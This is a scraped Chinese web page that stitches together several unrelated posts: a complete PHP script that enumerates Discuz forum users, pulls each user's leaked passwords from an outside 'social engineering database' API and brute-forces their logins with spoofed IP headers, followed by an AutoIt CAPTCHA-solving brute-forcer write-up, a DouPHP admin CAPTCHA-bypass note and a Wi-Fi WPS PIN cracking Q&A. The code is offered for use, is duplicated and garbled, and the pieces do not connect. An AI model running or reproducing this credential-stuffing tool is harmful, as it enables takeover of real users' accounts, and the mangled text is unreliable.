后台暴力burp爆破验证码但是有验证码怎么办

Discuz 爆破无视验证码,PHP 调用社工库暴破 Discuz 论坛账户脚本
| 阅读3167次 |
+++++++++++++++++++++++++++++++++++++++++++++++++++
开始爆破:php.exe $argv[0] 网址 起始uid 结束uid
示例: php.exe $argv[0] http://site.me/ 1 255
结果保存在ok.txt里
+++++++++++++++++++++++++++++++++++++++++++++++++++
以下代码保存为exp.php
class fuckdz{
public function sgk($user){
$a=file_get_contents("http://www.soyun.org/cha_api.php?so=$user&auto=");
$a=iconv("UTF-8", "GB2312//IGNORE", $a);
preg_match_all("/7%\"&(.*)&/isU",$a,$arr);
unset($arr[0]);
foreach ($arr as $key=&$r){
return $r;
public function getuid($host,$uid){
$ip= rand(100, 244).'.'.rand(100, 244).'.'.rand(100, 244).'.'.rand(100, 244);
$opts = array (
'http' =& array (
'method' =& 'GET',
'header'=& "User-Agent: Mozilla/5.0 (iP U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile\r\nReferer:/index.php\r\nX-Forwarded-For: $ip\r\nCookie: xx=xx",
'timeout'=&15, )
$context = stream_context_create($opts);
$a=file_get_contents("$host/home.php?mod=space&do=profile&from=space&&uid=$uid",false,$context);
if(strpos($a,'charset=utf-8')){
$a=iconv("UTF-8", "GB2312//IGNORE", $a);
if(preg_match("/&title&(.*)的个人/isU",$a,$arr)){
$a=str_replace("\r","",trim($arr[1]));
$a=trim(str_replace("\n","",$a));
return $a;
public function is_pass($host,$user,$pass){
$ip= rand(100, 244).'.'.rand(100, 244).'.'.rand(100, 244).'.'.rand(100, 244);
$opts = array (
'http' =& array (
'method' =& 'GET',
'header'=& "User-Agent: Mozilla/5.0 (iP U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobil\r\nReferer:/index.php\r\nX-Forwarded-For: $ip\r\nCookie: xx=xx",
'timeout'=&15, )
$context = stream_context_create($opts);
$a=file_get_contents("$host/member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes&inajax=1&handlekey=ls&quickforward=yes&username=$user&password=$pass",false,$context);
if(strpos($a,"window.location.href")){
public function crack($host,$a,$b){
$host=str_replace("http://","",$host);
$host="http://".$host."/";
for($vip=$a;$vip&=$b;$vip++){
if(!($user=$this-&getuid($host,$vip))){
$pass=$this-&sgk($user);
array_push($pass,"123456");
array_push($pass,"654321");
array_push($pass,"123123");
array_push($pass,"woaini");
array_push($pass,"caonima");
array_push($pass,"12345");
array_push($pass,"");
array_push($pass,"5201314");
array_push($pass,"1314520");
array_push($pass,$user);
array_push($pass,$user."123456");
array_push($pass,"abc123");
array_push($pass,$user."..");
for($i=0;isset($pass[$i]);$i++){
echo "\r\n正在爆破UID:$vip-[".$user."]---".$pass[$i]."";
if($this-&is_pass($host,$user,$pass[$i])){
echo "爆破成功!\r\n--------------------";
file_put_contents("ok.txt", $user."---".$pass[$i]."\r\n",FILE_APPEND);
echo "爆破失败";
$f=new fuckdz();
//error_reporting(0);
set_time_limit(0);
if(empty($argv[1])){
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
开始爆破:php.exe $argv[0] 网址 起始uid 结束uid
示例: php.exe $argv[0] http://phpinfo.me/ 1 255
结果保存在ok.txt里
Blog:http://phpinfo.me
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
if(!empty($argv[1])){
$f-&crack($argv[1],$argv[2],$argv[3]);
echo "逗比";
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136
&?php&class fuckdz{
&&&&public function sgk($user){&&&&&&&&$a=file_get_contents("http://www.soyun.org/cha_api.php?so=$user&auto=");&&&&&&&&$a=iconv("UTF-8", "GB2312//IGNORE", $a);&&&&&&&&preg_match_all("/7%\"&(.*)&/isU",$a,$arr);&&&&&&&&unset($arr[0]);&&&&&&&&foreach ($arr as $key=&$r){&&&&&&&&&&&&return $r;&&&&&&&&&&&&}&&&&}&&&&
&&&&public function getuid($host,$uid){&&&&&&&&&&&&$ip= rand(100, 244).'.'.rand(100, 244).'.'.rand(100, 244).'.'.rand(100, 244);&&&&&&&&&&&&$opts = array (&& &&&&&&&&&&&&'http' =& array (&& &&&&&&&&&&&&'method' =& 'GET',&& &&&&&&&&&&&&'header'=& "User-Agent: Mozilla/5.0 (iP U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile\r\nReferer:/index.php\r\nX-Forwarded-For: $ip\r\nCookie: xx=xx",&&&&&&&&&&&&'timeout'=&15, ) &&&&&&&&&&&&); &&&&&&&&&&&&$context = stream_context_create($opts); &&&&&&&&&&&& $a=file_get_contents("$host/home.php?mod=space&do=profile&from=space&&uid=$uid",false,$context);&&&&&&&&&&&&if(strpos($a,'charset=utf-8')){&&&&&&&&&&&&$a=iconv("UTF-8", "GB2312//IGNORE", $a);&&&&&&&&&&&& &&&&&&&&&&&&}&&&&&&&&&&&& &&&&&&&&&&&&if(preg_match("/&title&(.*)的个人/isU",$a,$arr)){&&&&&&&&&&&& &&&&&&&&&&&&$a=str_replace("\r","",trim($arr[1]));&&&&&&&&&&&&$a=trim(str_replace("\n","",$a));&&&&&&&&&&&&return $a; &&&&&&&&&&&&}else{&&&&&&&&&&&&return false;&&&&&&&&&&&&}&&&&&&&&&&&& &&&&}&&&& &&&&public function is_pass($host,$user,$pass){&&&&&&&&&&&&$ip= rand(100, 244).'.'.rand(100, 244).'.'.rand(100, 244).'.'.rand(100, 244);&&&&&&&&&&&&$opts = array (&& &&&&&&&&&&&&'http' =& array (&& &&&&&&&&&&&&'method' =& 'GET',&& &&&&&&&&&&&&'header'=& "User-Agent: Mozilla/5.0 (iP U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobil\r\nReferer:/index.php\r\nX-Forwarded-For: $ip\r\nCookie: xx=xx",&&&&&&&&&&&&'timeout'=&15, ) &&&&&&&&&&&&); &&&&&&&&&&&&&&&&&&&&&&&&&&$context = stream_context_create($opts); &&&&&&&&&&&& $a=file_get_contents("$host/member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes&inajax=1&handlekey=ls&quickforward=yes&username=$user&password=$pass",false,$context);&&&&&&&&&&&&if(strpos($a,"window.location.href")){&&&&&&&&&&&&&&&&return true;&&&&&&&&&&&&}else{&&&&&&&&&&&&&&&&return false;&&&&&&&&&&&&}&&&& &&&&}&&&&public function crack($host,$a,$b){&&&&$host=str_replace("http://","",$host);&&&&$host="http://".$host."/"; &&&&for($vip=$a;$vip&=$b;$vip++){ &&&&&&&& &&&&&&&&if(!($user=$this-&getuid($host,$vip))){&&&&&&&& &&&&&&&& continue;&&&&&&&&}&&&&&&&&$pass=$this-&sgk($user);&&&&&&&&array_push($pass,"123456");&&&&&&&&array_push($pass,"654321");&&&&&&&&array_push($pass,"123123");&&&&&&&&array_push($pass,"woaini");&&&&&&&&array_push($pass,"caonima");&&&&&&&&array_push($pass,"12345");&&&&&&&&array_push($pass,"");&&&&&&&&array_push($pass,"5201314");&&&&&&&&array_push($pass,"1314520");&&&&&&&&array_push($pass,$user);&&&&&&&&array_push($pass,$user."123456");&&&&&&&&array_push($pass,"abc123");&&&&&&&&array_push($pass,$user."..");&&&&&&&& &&&&&&&&&&&&for($i=0;isset($pass[$i]);$i++){ &&&&&&&&&&&&&&&&echo "\r\n正在爆破UID:$vip-[".$user."]---".$pass[$i]."";&&&&&&&&&&&&&&&&if($this-&is_pass($host,$user,$pass[$i])){&&&&&&&&&&&&&&&&&&&&&&&&echo "爆破成功!\r\n--------------------";&&&&&&&&&&&&&&&&&&&&&&&&file_put_contents("ok.txt", $user."---".$pass[$i]."\r\n",FILE_APPEND);&&&&&&&&&&&&&&&&&&&&&&&&break;&&&&&&&&&&&&&&&&&&&&&&&& &&&&&&&&&&&&&&&&&&&&}else{&&&&&&&&&&&&&&&&&&&&&&&&echo "爆破失败";&&&&&&&&&&&&&&&&&&&&}&&&&&&&&&&&&&&&& &&&&&&&&&&&&&&&&&&} &&&&&&&&&&&&&&&&&&} &&&&}&&&& &&&& }$f=new fuckdz();//error_reporting(0);set_time_limit(0); if(empty($argv[1])){print_r("+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++&&
&&&&&&开始爆破:php.exe $argv[0] 网址 起始uid 结束uid &&&&&&示例: php.exe $argv[0] http://phpinfo.me/ 1 255&&&&&&结果保存在ok.txt里&&&&&&Blog:http://phpinfo.me&&&& +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++&& \n\n\n");}else{
if(!empty($argv[1])){&&&&&&$f-&crack($argv[1],$argv[2],$argv[3]);&&}else{&&&&echo "逗比"; }
<a href="/discuz-7-bug/" title="Discuz
<img src="/wp-content/themes/goodluck/timthumb.php?src=/wp-content/uploads/.jpg&h=144&w=208&zc=1" alt="Discuz
<a href="/discuz-7-bug/" title="Discuz Discuz <= 7.2 SQL未公开注入漏洞
(C) 体验盒子_关注网络安全 , Power by WordPress / Design by MuFeng / Modify by AdoingBurpSuite有点“懒”,你们是怎样完成带验证码爆破的?
先说一下本文的来龙去脉:
&&&&我是去年才接触到BurpSuite这个神器的,在此之前我都是自写工具来爆破密码的(网上找到的要么有针对性,要么不称手);使用了一段时间后发现BurpSuite比我自己的工具效率高的多,我写的东西真他妈垃圾&&;再后来发现无法使用BurpSuite来完成带验证码的爆破,自写的工具终于有用武之地了。
&&&&鉴于BurpSuite的高效,手里握的这些东西也没什么大用了,果断发出来大家共同交流、研究。
提醒:本文所指的验证码是指简单的验证码,至于复杂的,识别算法也够复杂。有兴趣的可以去看@鬼哥Blog里面这方面的文章。
语言:AutoIt v3(C++)
构想:工具内置,完成网页自动操作。
劣势:自制工具单线程速度较BurpSuite慢很多。
优势:在浏览器中操作,模仿人工,而非Post数据包不会被某些JS检测;带验证码识别。
一、用KODA图形编辑器画好界面
二、生成窗体代码,编写事件代码
&&&&1、引用各类库函数,Autoit3的优点是很多比较实用的功能已经封装好,加参数引用即可,缺点是执行效率低了一点。编写爆破程序所要用到的库函数如下(见名而知意):
#include &GUIConstantsEx.au3&
#include &WindowsConstants.au3&
#include &IE.au3&
#Include &String.au3&
#include &array.au3&
#include &Excel.au3&
#include &ProgressConstants.au3&
#include &EditConstants.au3&
#include &ButtonConstants.au3&
#include &StaticConstants.au3&
#include&GuiEdit.au3&
#include &acn_skin.au3&;皮肤加载
#include &file.au3&;文件管理
#include &getCODE.au3&;自定义头文件,识别图形验证码用
&&&&2、编写爆破代码
&&&&爆破密码的代码如下(用户&密码、+验证码可自己发挥):
(严重变形,只能截图发上来了。)
&&&&循环输入字典中的每条字符并提交,直到提交后的页面没有密码输入框且没有特定的字符串为止(此为判定依据,只有输入了正确密码或是无法打开网页了才会出现这种情况)。
&&&&这时候已经能够用编写的工具来爆破WebShell密码了。
&&&&网速不错的情部下,一秒种猜3到5个密码没有问题。
三、改进代码支持用户名+密码
&&&&用户名+密码爆破比较简单,一个循环就搞定了。
三、改进代码支持用户名+密码+验证码爆破
&&&&带验证码的爆破比较复杂,需要先识别验证码(讯时那种直接生成数字而非图片验证码的除外)。幸好Autoit有丰富的GDI库支持,简单的调用便可搞定一般的验证码。思路如下:
&&&&打开登录页&&》获得验证码链接&&》打开验证码链接刷新取得验证码&&》保存验证码图片到本地&&》GDI拆解验证码图片为像素点色值&&》存像素点位置及色值入数组&&》二值化打印0&F&&》处理噪点&&》匹配特征库(预先做好,对付数字及英文验证码)&&》输出验证码&&》爆破
验证码图:
特征码库:
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFF000000FFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFF000000FFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
对付汛时验证码:
对付一般的数字或英文图片验证码:
验证码打散识别:
现在约有%15左右的小站仍在使用简单的验证码,所以识别有的时候也派的上用场。
有了Autoit,XX监视器、XX发贴机&&做起来也非常简单了,动手吧!
对于复杂、粘连、中文、多次形变的验证码(还没想到方法,算法太复杂)
如果您有好的方法和见解请回复,谢啦!^_^&
(window.slotbydup=window.slotbydup || []).push({
id: '2467140',
container: s,
size: '1000,90',
display: 'inlay-fix'
(window.slotbydup=window.slotbydup || []).push({
id: '2467141',
container: s,
size: '1000,90',
display: 'inlay-fix'
(window.slotbydup=window.slotbydup || []).push({
id: '2467143',
container: s,
size: '1000,90',
display: 'inlay-fix'
(window.slotbydup=window.slotbydup || []).push({
id: '2467148',
container: s,
size: '1000,90',
display: 'inlay-fix'DOUPHP后台验证码绕过(官方DEMO测试)
现在位置: &
& DOUPHP后台验证码绕过(官方DEMO测试)
DOUPHP后台验证码绕过(官方DEMO测试)
浏览(4074) &
看起来有验证码,固定Cookie中的PHPSESSID不变即可进行暴力破解。
admin/login.php
if (!is_array($user)) {
$dou-&create_admin_log($_LANG['login_action'] . ': ' . $_POST['user_name'] . " ( " . $_LANG['login_user_name_wrong'] . " ) ");
$dou-&dou_msg($_LANG['login_input_wrong'], 'login.php', 'out');
} elseif (md5($_POST['password']) != $user['password']) {
if ($_POST['password']) {
$dou-&create_admin_log($_LANG['login_action'] . ': ' . $_POST['user_name'] . " ( " . $_LANG['login_password_wrong'] . " ) ");
$dou-&dou_msg($_LANG['login_input_wrong'], 'login.php', 'out');
对登录失败判断没有对session的操作,只是dou_msg()。
我们的测试字典文件
/admin/login.php 这里是自带密码admin888的,我把它添加到playload里去。
正确密码返回302
Location: /admin/index.php
已经登录成功。&&&&转载分享请注明原文地址(Yulong's Blog nmap nmap.cc):http://nmap.cc/jsjl/194.html
上一篇:下一篇:
分类热门文章
最新文章最新评论用命令行进行PIN验证,为什么验证码不是连续的?漏码了?_百度知道
用命令行进行PIN验证,为什么验证码不是连续的?漏码了?
wap&#47。 而哥的运气真差,之前有了解PIN上周开始学习无线PJ,你不能量化1000字典和1亿字典的关系,并加了-n!但有个缺点;wap2原理到弄清cdlinux,就是对方必须开WPS功能:21,最后发现爆破的概率实在无法预知,从制作U盘启动盘到量产三驱三启,昨天开始向这个方向学习:0A的TP-link路由器,为什么PIN的码不是连续的;PIN,按其原理所示、beini,只能说1亿字典的几率会很大?求解,3sec&#47,就遇到传说中很难破得MAC前3短是8C?漏码了吗。 只好找其它办法,可谓是一种攻击、xiaopan,我试的默认速度,那PJ的几率是100%,且路由器必须在线并必能刺激其防御机制、bt及n个PJ软件,从了解wep&#47,如果其PIN码结构是4+3+1的话,还没尝到胜利的滋味
至于能不能出来那就要看对方路由器有没有PIN 限制了没有限制就一定可以出来的?并且还可以对PIN码排序的,有几个如AAA什么是不用的,你也不用去理这个pin码啊,你按照启动PIN 就可以在哪里等了。第二个你哪里看到不是连续的了。其实我也仔细看过pin码,你不开发这个软件的话
其他类似问题
为您推荐:
命令行的相关知识
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁

我要回帖

更多关于 python 验证码 爆破 的文章

 

随机推荐